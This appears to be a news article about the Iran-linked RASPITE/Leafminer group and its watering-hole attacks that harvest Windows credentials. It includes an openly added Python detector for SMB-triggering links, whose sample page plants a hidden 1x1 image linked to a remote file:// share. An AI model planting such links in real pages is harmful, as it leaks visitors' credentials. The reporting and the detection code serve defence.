The Iran-linked APT group RASPITE is targeting US, Middle East, Europe, and East Asia

in attack •  6 years ago 

An Iran-linked hacker group called RASPITE has been targeting facilities in the United States, Europe, the Middle East and East Asia. The group has been active since at least 2017, and researchers have discovered attacks on government and other types of organizations in the Middle East.

Last week, Symantec researchers released a detailed report on the cyber-espionage group's activities, based on their tracking of the group as Leafminer. The researchers said the group's attacks could be more extensive, and they found a list of 809 targets written in Persian. The list is grouped by region and industry of interest, and covers targets in the United Arab Emirates, Qatar, Bahrain, Egypt, and Afghanistan. The attackers have scanned the systems of these targets.

Now Dragos researchers have confirmed that it is RASPITE that has been targeting industrial control systems, and hackers have also visited the US power sector.

The hackers use compromised websites to conduct watering hole attacks, serving potential victims content that interests them. The RASPITE attacks look similar to those of DYMALLOY and ALLANITE, in which hackers collect Windows credentials by injecting a link into a website that prompts an SMB connection. The attacker then deploys a script to install malware that connects to a C&C server and lets the attacker take control of the infected computer.
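As an added example (not from the original post or from the Dragos or Symantec reports), here is a defender-side check for the technique described above: it scans a page's HTML for resource links that would make a Windows client open an SMB connection to a remote host. The sample page, the host names and the `find_smb_refs` helper are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Attributes whose value a client fetches automatically or on click.
URL_ATTRS = {"src", "href", "data", "background", "poster"}
# UNC path (\\host\share) or file: URL naming a remote host
# (file://host/... or file:////host/...). file:///C:/... is local and ignored.
SMB_REF = re.compile(r"^(?:\\\\|file:(?:////|//)(?!/))([^/\\]+)", re.I)
LOCAL_HOSTS = {"localhost", "127.0.0.1"}


class SmbRefFinder(HTMLParser):
    """Collects (line, tag, attribute, host) for links that trigger SMB."""

    def __init__(self, allowed_hosts=()):
        super().__init__()
        # Hosts the site owner expects (assumption: an allowlist is available).
        self.allowed = {h.lower() for h in allowed_hosts} | LOCAL_HOSTS
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name not in URL_ATTRS or not value:
                continue
            match = SMB_REF.match(value.strip())
            if match and match.group(1).lower() not in self.allowed:
                line = self.getpos()[0]
                self.findings.append((line, tag, name, match.group(1).lower()))


def find_smb_refs(html, allowed_hosts=()):
    finder = SmbRefFinder(allowed_hosts)
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample page: 203.0.113.10 is a documentation address.
SAMPLE = """<html><body>
<p>Industry conference agenda</p>
<img src="file://203.0.113.10/share/logo.png" width="1" height="1">
<img src="//cdn.example.com/banner.png">
<a href="file:///C:/Users/Public/readme.txt">local</a>
<img src="\\\\fileserver.corp.example\\img\\x.png">
</body></html>"""

if __name__ == "__main__":
    for finding in find_smb_refs(SAMPLE):
        print("SMB-triggering reference:", finding)
```

The check covers HTML attributes only; references inside CSS or script would need separate handling.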

According to Dragos, even though RASPITE primarily targets ICS systems, there are no reports that such devices have been subjected to devastating attacks.

